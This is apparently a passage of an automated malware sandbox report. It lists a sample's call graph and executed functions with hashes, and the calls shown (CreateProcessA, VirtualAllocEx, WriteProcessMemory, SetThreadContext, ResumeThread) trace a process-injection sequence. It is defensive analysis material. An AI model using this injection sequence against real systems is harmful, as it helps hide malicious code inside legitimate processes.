WriteProcessMemory 4045->4047 4048 1aa6f50 WriteProcessMemory 4045->4048 4046 1aa89a3 4047->4046 4048->4046 4159 1aa7e34 4160 1aa7e41 4159->4160 4161 1aa8af6 4160->4161 4162 1aa6e29 VirtualAllocEx 4160->4162 4163 1aa6e30 VirtualAllocEx 4160->4163 4164 1aa6be8 ResumeThread 4160->4164 4165 1aa6be1 ResumeThread 4160->4165 4162->4160 4163->4160 4164->4160 4165->4160 4025 1aa8302 4026 1aa830b 4025->4026 4031 1aa6f48 WriteProcessMemory 4026->4031 4032 1aa6f50 WriteProcessMemory 4026->4032 4027 1aa7ead 4028 1aa8730 4027->4028 4029 1aa6be8 ResumeThread 4027->4029 4030 1aa6be1 ResumeThread 4027->4030 4033 1aa6e29 VirtualAllocEx 4027->4033 4034 1aa6e30 VirtualAllocEx 4027->4034 4029->4027 4030->4027 4031->4027 4032->4027 4033->4027 4034->4027 4035 1aa8185 4042 1aa6d08 SetThreadContext 4035->4042 4043 1aa6d00 SetThreadContext 4035->4043 4036 1aa7ead 4037 1aa8af6 4036->4037 4038 1aa6be8 ResumeThread 4036->4038 4039 1aa6be1 ResumeThread 4036->4039 4040 1aa6e29 VirtualAllocEx 4036->4040 4041 1aa6e30 VirtualAllocEx 4036->4041 4038->4036 4039->4036 4040->4036 4041->4036 4042->4036 4043->4036 4049 1aa84d0 4053 1aa70a8 4049->4053 4057 1aa70a1 4049->4057 4050 1aa84f2 4054 1aa70f4 ReadProcessMemory 4053->4054 4056 1aa716c 4054->4056 4056->4050 4058 1aa70f4 ReadProcessMemory 4057->4058 4060 1aa716c 4058->4060 4060->4050

                                                                  Executed Functions

                                                                  Function 01AA76D5 Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01AA79A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: f2f475781f55762cc0bf3113e040ddc652b3f990b12592653ce9e7f4f65b1a5a
                                                                  • Instruction ID: 02176b216b52f4ff634232369465770f7f866a2d51ed078cfcbfa2557a4276f7
                                                                  • Opcode Fuzzy Hash: f2f475781f55762cc0bf3113e040ddc652b3f990b12592653ce9e7f4f65b1a5a
                                                                  • Instruction Fuzzy Hash: CDC13871D002298FDB21CFA8C841BEEBBB1BF49300F4495A9E849B7240DB759A85CF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA76E0 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01AA79A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: f94afd95bdbe01fbc746dc22988c2476cbc33e746f8c536788a3db9c87290873
                                                                  • Instruction ID: 83d189ba2b773f449ebf756d1fc4d2801666d50e4c69c7ed32c0c9461b67c31a
                                                                  • Opcode Fuzzy Hash: f94afd95bdbe01fbc746dc22988c2476cbc33e746f8c536788a3db9c87290873
                                                                  • Instruction Fuzzy Hash: FCC12771D002298FDB21CFA9C841BEEBBB1FF49300F4495A9E849B7240DB759A85CF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA6F48 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AA7023
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: cd3cc991dd9eeb9a72d5d3f9faa320ddebfdd221d823978601c887d69b78165c
                                                                  • Instruction ID: 6d9e091532ebe2c0d0ef5316c7244694431c673920838f4bc0cbed337ff6cd49
                                                                  • Opcode Fuzzy Hash: cd3cc991dd9eeb9a72d5d3f9faa320ddebfdd221d823978601c887d69b78165c
                                                                  • Instruction Fuzzy Hash: 73419BB5D012589FCF00CFA9D984AEEFBF1BB49314F54902AE818B7210D739AA45CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA6F50 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AA7023
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: eaaadee21ac865352d30b3a8860a7a3190a81a2fafa30b05d35f394796e30cc7
                                                                  • Instruction ID: 0b7b1ba47330378c5b0ed8d66c9f1397084df4365cda766ca636939b2275aa43
                                                                  • Opcode Fuzzy Hash: eaaadee21ac865352d30b3a8860a7a3190a81a2fafa30b05d35f394796e30cc7
                                                                  • Instruction Fuzzy Hash: 0B419AB5D012589FCF00CFAAD984ADEFBF1BB49314F54902AE818B7210D739AA45CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA70A1 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AA715A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: f336e6e58cadbfad07848717100f16c65c3ea968d96af86fb6cd5fd3496eb227
                                                                  • Instruction ID: 35b9cfa821ec58ee5d1bf7dcd008c8f3228253ccf5c350b8a0791c96a997a516
                                                                  • Opcode Fuzzy Hash: f336e6e58cadbfad07848717100f16c65c3ea968d96af86fb6cd5fd3496eb227
                                                                  • Instruction Fuzzy Hash: 3B4188B5D00258DFCF10CFAAD980AEEFBB1BB49310F54942AE815B7210D739A945CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA70A8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AA715A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 5adb22914c5a31b41da9f6ddc8503476eeb67660fa4f91bb2130578fe4c9ee5f
                                                                  • Instruction ID: e72539b6c5ccc4ac36dca8cef5e34d24b46a0d1b0c54eeb985b96e9813122f0a
                                                                  • Opcode Fuzzy Hash: 5adb22914c5a31b41da9f6ddc8503476eeb67660fa4f91bb2130578fe4c9ee5f
                                                                  • Instruction Fuzzy Hash: 644188B5D002589FCF10CFEAD880AEEFBB5BB49310F54942AE815B7210D739A945CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA6E29 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01AA6EDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 7a289184f3aa05ddc28adc96584750d2471a5bb7a9ea4f0d053ecd82c3f5faab
                                                                  • Instruction ID: 82f1962100bb5d47153915a1fc5c7613bc713a968d36b48c3b5ff217fa78e67f
                                                                  • Opcode Fuzzy Hash: 7a289184f3aa05ddc28adc96584750d2471a5bb7a9ea4f0d053ecd82c3f5faab
                                                                  • Instruction Fuzzy Hash: 903177B5D002589FCF10CFAAD980ADEBBB5AB49310F14A42AE819B7310D735A946CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA6E30 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01AA6EDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: eb3556e21432f0d29592bfc56e9026ea6ef5eaba9d1db4bd1bfc443877c27a5d
                                                                  • Instruction ID: a6d6cde80ccef7bea95ffb4bbc62cb63b752311f351953e92f4d1798605180cc
                                                                  • Opcode Fuzzy Hash: eb3556e21432f0d29592bfc56e9026ea6ef5eaba9d1db4bd1bfc443877c27a5d
                                                                  • Instruction Fuzzy Hash: 873166B5D002589FCF10CFAAD980ADEBBB5AB49310F14A42AE819B7310D735A946CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA6D00 Relevance: 1.6, APIs: 1, Instructions: 95threadinjectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetThreadContext.KERNELBASE(?,?), ref: 01AA6DB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThread
                                                                  • String ID:
                                                                  • API String ID: 1591575202-0
                                                                  • Opcode ID: 381daafd724f7abe0b3e0b53978d6e4abb9830de4ad919dd9bd7ca30f57ed4b9
                                                                  • Instruction ID: daac9b71b2c8f173a1358e6b943e87e193825585c49abf6f2fcbf0f39c6bdc98
                                                                  • Opcode Fuzzy Hash: 381daafd724f7abe0b3e0b53978d6e4abb9830de4ad919dd9bd7ca30f57ed4b9
                                                                  • Instruction Fuzzy Hash: B641ACB5D01258DFDB10DFAAD884AEEBFF1AB49314F54902AE418B7200D7389985CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA6D08 Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetThreadContext.KERNELBASE(?,?), ref: 01AA6DB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThread
                                                                  • String ID:
                                                                  • API String ID: 1591575202-0
                                                                  • Opcode ID: b5cdef4576905c50476cfd889b78e3ded4a16a58fb3974b19e0251ff34f14d9b
                                                                  • Instruction ID: 40a05d202c48f7fa7004aec50729bfcf05403b374a7f18ebfdfbc904945d7fba
                                                                  • Opcode Fuzzy Hash: b5cdef4576905c50476cfd889b78e3ded4a16a58fb3974b19e0251ff34f14d9b
                                                                  • Instruction Fuzzy Hash: 0A319DB5D01258DFDB10DFAAD484AEEBFF1AB49314F54802AE418B7240D778A985CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA6BE1 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ResumeThread.KERNELBASE(?), ref: 01AA6C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: a18419cd2dca0d4a8f15ff90d10598faa7a9251f2b93f2cc321cfc697f228b2f
                                                                  • Instruction ID: 5577631b1e404abcd2cb18123f654318056fa4431305fe9f8465efc1c4813e0f
                                                                  • Opcode Fuzzy Hash: a18419cd2dca0d4a8f15ff90d10598faa7a9251f2b93f2cc321cfc697f228b2f
                                                                  • Instruction Fuzzy Hash: F731CCB4D012189FCF10CFAAD880AEEFBB5EB49314F54942AE818B7300D734A941CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA6BE8 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ResumeThread.KERNELBASE(?), ref: 01AA6C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 1dc83e93df2bce5c3deea905b16a2c0fcd50f0f4b683e5422ee16ba4697d9e2c
                                                                  • Instruction ID: 38e790747f8134540af60a47323f2efd8d038d20cf761b8f1ceb99b3ffb21b34
                                                                  • Opcode Fuzzy Hash: 1dc83e93df2bce5c3deea905b16a2c0fcd50f0f4b683e5422ee16ba4697d9e2c
                                                                  • Instruction Fuzzy Hash: FE31ACB4D012189FCF14CFAAD584AEEFBB5EB49314F54942AE819B7300C734A941CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 01AA4810 Relevance: 4.0, Strings: 3, Instructions: 202COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: P$UUUU$rA29
                                                                  • API String ID: 0-1803072496
                                                                  • Opcode ID: 825a458211af9591123622949a4865beebad8605d6615250a7df0e7c3ed752ca
                                                                  • Instruction ID: 7619ed192be417e325bdfe79e697b68ca62bc3f821c6bdce6f9af99186d26ce9
                                                                  • Opcode Fuzzy Hash: 825a458211af9591123622949a4865beebad8605d6615250a7df0e7c3ed752ca
                                                                  • Instruction Fuzzy Hash: 1EA1B4B1E016288FDB64CFA9DA807CDFBF6AB88300F5491A6D548EB245D7349E85CF04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA0BD0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4
                                                                  • API String ID: 0-4088798008
                                                                  • Opcode ID: a4a8176995975773fe06ec9e5ed7867296bbac83ae2110bd08883ad58d106464
                                                                  • Instruction ID: e29097a9c273f7c088125b7860ccf6409bbfe62da53140e3a5926995f0f7f8fe
                                                                  • Opcode Fuzzy Hash: a4a8176995975773fe06ec9e5ed7867296bbac83ae2110bd08883ad58d106464
                                                                  • Instruction Fuzzy Hash: 58516071E016588BEB69CF6B8D4078AFAF7BFC8200F58D1FA950CA7255DB704A858F11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA0BC0 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4
                                                                  • API String ID: 0-4088798008
                                                                  • Opcode ID: a834f3d70ed6cca95925b5aa8a2ec2e48bc3a6911e34ebb1968849ef65437d54
                                                                  • Instruction ID: 61546c915417b738284790473d0331139ccc104a8a126e5276e457cd17a1a303
                                                                  • Opcode Fuzzy Hash: a834f3d70ed6cca95925b5aa8a2ec2e48bc3a6911e34ebb1968849ef65437d54
                                                                  • Instruction Fuzzy Hash: D2418071E016148BEB6DCF6B8D4079AFAF7BFC8200F54C1FA950CAA255DB704A858F11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA5E10 Relevance: .6, Instructions: 604COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4bfc02ba686d4efddca084eee75c62d3f1f26d11dc8ee158310f2a6777391ed6
                                                                  • Instruction ID: dd75954bce9698115c36d22fe4611c88c0a1d839e7ae4f6da6284dea3553cf76
                                                                  • Opcode Fuzzy Hash: 4bfc02ba686d4efddca084eee75c62d3f1f26d11dc8ee158310f2a6777391ed6
                                                                  • Instruction Fuzzy Hash: 62326B39C05346EFD388DF78C846551FBB0FF8922435891AEDE800918ADB35ED5AAF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA0968 Relevance: .1, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0521688ece6414ff066de3081e74b1eb5510e56a32b31cdc6c67dcf73e678f52
                                                                  • Instruction ID: 0b03b9a19474aab36b7884001c4dab0ae220c11a7121914f6f5e96b329bbbbe4
                                                                  • Opcode Fuzzy Hash: 0521688ece6414ff066de3081e74b1eb5510e56a32b31cdc6c67dcf73e678f52
                                                                  • Instruction Fuzzy Hash: EE511970A00249CFE759EFB9E85469ABBB2FB88304F14C929D408AB365EF785815CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01AA0978 Relevance: .1, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4c6a58bc6c0824f51588cad8a4ae199a5581ad11b891e0fc0f8fe364f5cbb6f
                                                                  • Instruction ID: 9b0e2dcd64c352e488fbc3b9e65ea1e43cda8620ff96632293b090b1a287d379
                                                                  • Opcode Fuzzy Hash: f4c6a58bc6c0824f51588cad8a4ae199a5581ad11b891e0fc0f8fe364f5cbb6f
                                                                  • Instruction Fuzzy Hash: F0510A70A00249CFE759EFB9E85469EBBF3BB88304F14C829D408AB365EF785855CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:5.6%
                                                                  Dynamic/Decrypted Code Coverage:3.4%
                                                                  Signature Coverage:4.7%
                                                                  Total number of Nodes:643
                                                                  Total number of Limit Nodes:79
                                                                  execution_graph 23324 1481879 23325 1481885 23324->23325 23327 1481899 23325->23327 23330 1439660 LdrInitializeThunk 23325->23330 23329 14818bf 23329->23327 23331 1481ad6 LdrInitializeThunk 23329->23331 23330->23329 23331->23327 23332 4200f3 23335 41e7b3 23332->23335 23340 41f203 23335->23340 23337 41e7cf 23344 1439a00 LdrInitializeThunk 23337->23344 23338 41e7ea 23341 41f288 23340->23341 23342 41f212 23340->23342 23341->23337 23342->23341 23345 4195b3 23342->23345 23344->23338 23346 4195cd 23345->23346 23347 4195c1 23345->23347 23346->23341 23347->23346 23350 419a33 LdrLoadDll 23347->23350 23349 41971f 23349->23341 23350->23349 23351 1439540 LdrInitializeThunk 23353 40b553 23354 40b578 23353->23354 23359 40cf93 23354->23359 23358 40b5d0 23360 40cfb7 23359->23360 23361 40b5ab 23360->23361 23362 40cff3 LdrLoadDll 23360->23362 23361->23358 23363 40eb23 23361->23363 23362->23361 23364 40eb4f 23363->23364 23374 41e413 23364->23374 23367 40eb6f 23367->23358 23371 40ebaa 23383 41e6c3 23371->23383 23373 40ebcd 23373->23358 23375 41f203 LdrLoadDll 23374->23375 23376 40eb68 23375->23376 23376->23367 23377 41e453 23376->23377 23378 41f203 LdrLoadDll 23377->23378 23379 41e46f 23378->23379 23386 1439710 LdrInitializeThunk 23379->23386 23380 40eb92 23380->23367 23382 41ea43 LdrLoadDll 23380->23382 23382->23371 23384 41f203 LdrLoadDll 23383->23384 23385 41e6df NtClose 23384->23385 23385->23373 23386->23380 23388 401798 23389 4017a5 23388->23389 23393 423308 23389->23393 23397 423313 23389->23397 23390 401822 23394 423313 23393->23394 23400 41fc33 23394->23400 23398 41fc33 22 API calls 23397->23398 23399 42331e 23398->23399 23399->23390 23401 41fc59 23400->23401 23414 40bf23 23401->23414 23403 41fc65 23404 41fcc9 23403->23404 23422 410103 23403->23422 23404->23390 23406 41fc84 23407 41fc97 23406->23407 23434 4100c3 23406->23434 23410 41fcac 23407->23410 23443 41e8e3 23407->23443 23439 403593 23410->23439 23412 41fcbb 23413 41e8e3 2 API calls 23412->23413 23413->23404 23446 40be73 23414->23446 23416 40bf30 23417 40bf37 23416->23417 23458 40be13 23416->23458 23417->23403 23423 41012f 23422->23423 23849 40d463 23423->23849 23425 410141 23853 40ffd3 23425->23853 23428 410185 23428->23406 23429 410174 23429->23428 23433 41e6c3 2 API calls 23429->23433 23430 41015c 23431 410167 23430->23431 23432 41e6c3 2 API calls 23430->23432 23431->23406 23432->23431 23433->23428 23435 4195b3 LdrLoadDll 23434->23435 23436 4100e2 23435->23436 23437 4100e9 23436->23437 23438 4100eb GetUserGeoID 23436->23438 23437->23407 23438->23407 23440 4035ea 23439->23440 23441 4035f7 23440->23441 23872 40dde3 23440->23872 23441->23412 23444 41e902 ExitProcess 23443->23444 23445 41f203 LdrLoadDll 23443->23445 23445->23444 23477 41ce63 23446->23477 23450 40be99 23450->23416 23451 40be8f 23451->23450 23484 41f583 23451->23484 23453 40bed6 23453->23450 23495 40bcb3 23453->23495 23455 40bef6 23501 40b713 LdrLoadDll 23455->23501 23457 40bf08 23457->23416 23459 40be30 23458->23459 23460 41f873 LdrLoadDll 23458->23460 23831 41f873 23459->23831 23460->23459 23463 41f873 LdrLoadDll 23464 40be5d 23463->23464 23465 40fec3 23464->23465 23466 40fedc 23465->23466 23835 40d2e3 23466->23835 23468 40feef 23469 41e413 LdrLoadDll 23468->23469 23470 40fefe 23469->23470 23476 40bf48 23470->23476 23839 41ea03 23470->23839 23472 40ff40 23474 41e6c3 2 API calls 23472->23474 23473 40ff15 23473->23472 23842 41e493 23473->23842 23474->23476 23476->23403 23478 41ce72 23477->23478 23479 4195b3 LdrLoadDll 23478->23479 23480 40be86 23479->23480 23481 41cd23 23480->23481 23502 41e833 23481->23502 23485 41f59c 23484->23485 23505 4191a3 23485->23505 23487 41f5b4 23488 41f5bd 23487->23488 23544 41f3c3 23487->23544 23488->23453 23490 41f5d1 23490->23488 23561 41e133 23490->23561 23492 41f605 23566 420133 23492->23566 23809 4094a3 23495->23809 23497 40bcd4 23497->23455 23498 40bccd 23498->23497 23822 409763 23498->23822 23501->23457 23503 41cd38 23502->23503 23504 41f203 LdrLoadDll 23502->23504 23503->23451 23504->23503 23506 4194e6 23505->23506 23507 4191b7 23505->23507 23506->23487 23507->23506 23569 41de83 23507->23569 23510 4192e8 23572 41e593 23510->23572 23511 4192cb 23629 41e693 LdrLoadDll 23511->23629 23514 4192d5 23514->23487 23515 41930f 23516 420133 2 API calls 23515->23516 23520 41931b 23516->23520 23517 4194aa 23518 41e6c3 2 API calls 23517->23518 23521 4194b1 23518->23521 23519 4194c0 23635 418ec3 LdrLoadDll NtReadFile NtClose 23519->23635 23520->23514 23520->23517 23520->23519 23525 4193b3 23520->23525 23521->23487 23523 4194d3 23523->23487 23524 41941a 23524->23517 23526 41942d 23524->23526 23525->23524 23527 4193c2 23525->23527 23631 41e513 23526->23631 23529 4193c7 23527->23529 23530 4193db 23527->23530 23630 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 23529->23630 23531 4193e0 23530->23531 23532 4193f8 23530->23532 23575 418e23 23531->23575 23532->23521 23587 418b43 23532->23587 23537 4193d1 23537->23487 23538 4193ee 23538->23487 23540 41948d 23542 41e6c3 2 API calls 23540->23542 23541 419410 23541->23487 23543 419499 23542->23543 23543->23487 23545 41f3de 23544->23545 23546 41f3f0 23545->23546 23653 4200b3 23545->23653 23546->23490 23548 41f410 23656 4187a3 23548->23656 23550 41f433 23550->23546 23551 4187a3 3 API calls 23550->23551 23554 41f455 23551->23554 23553 41f4dd 23555 41f4ed 23553->23555 23776 41f183 LdrLoadDll 23553->23776 23554->23546 23681 419b03 23554->23681 23692 41eff3 23555->23692 23558 41f51b 23771 41e0f3 23558->23771 23560 41f545 23560->23490 23562 41e14f 23561->23562 23563 41f203 LdrLoadDll 23561->23563 23803 143967a 23562->23803 23563->23562 23564 41e16a 23564->23492 23567 41f62f 23566->23567 23806 41e8a3 23566->23806 23567->23453 23570 41929c 23569->23570 23571 41f203 LdrLoadDll 23569->23571 23570->23510 23570->23511 23570->23514 23571->23570 23573 41e5af NtCreateFile 23572->23573 23574 41f203 LdrLoadDll 23572->23574 23573->23515 23574->23573 23576 418e3f 23575->23576 23577 41e513 LdrLoadDll 23576->23577 23578 418e60 23577->23578 23579 418e67 23578->23579 23580 418e7b 23578->23580 23581 41e6c3 2 API calls 23579->23581 23582 41e6c3 2 API calls 23580->23582 23583 418e70 23581->23583 23584 418e84 23582->23584 23583->23538 23636 420253 LdrLoadDll RtlAllocateHeap 23584->23636 23586 418e8f 23586->23538 23588 418bc1 23587->23588 23589 418b8e 23587->23589 23590 418d09 23588->23590 23594 418bdd 23588->23594 23591 41e513 LdrLoadDll 23589->23591 23592 41e513 LdrLoadDll 23590->23592 23593 418ba9 23591->23593 23599 418d24 23592->23599 23595 41e6c3 2 API calls 23593->23595 23596 41e513 LdrLoadDll 23594->23596 23597 418bb2 23595->23597 23598 418bf8 23596->23598 23597->23541 23601 418c14 23598->23601 23602 418bff 23598->23602 23649 41e553 LdrLoadDll 23599->23649 23605 418c19 23601->23605 23606 418c2f 23601->23606 23604 41e6c3 2 API calls 23602->23604 23603 418d5e 23607 41e6c3 2 API calls 23603->23607 23608 418c08 23604->23608 23609 41e6c3 2 API calls 23605->23609 23614 418c34 23606->23614 23637 420213 23606->23637 23610 418d69 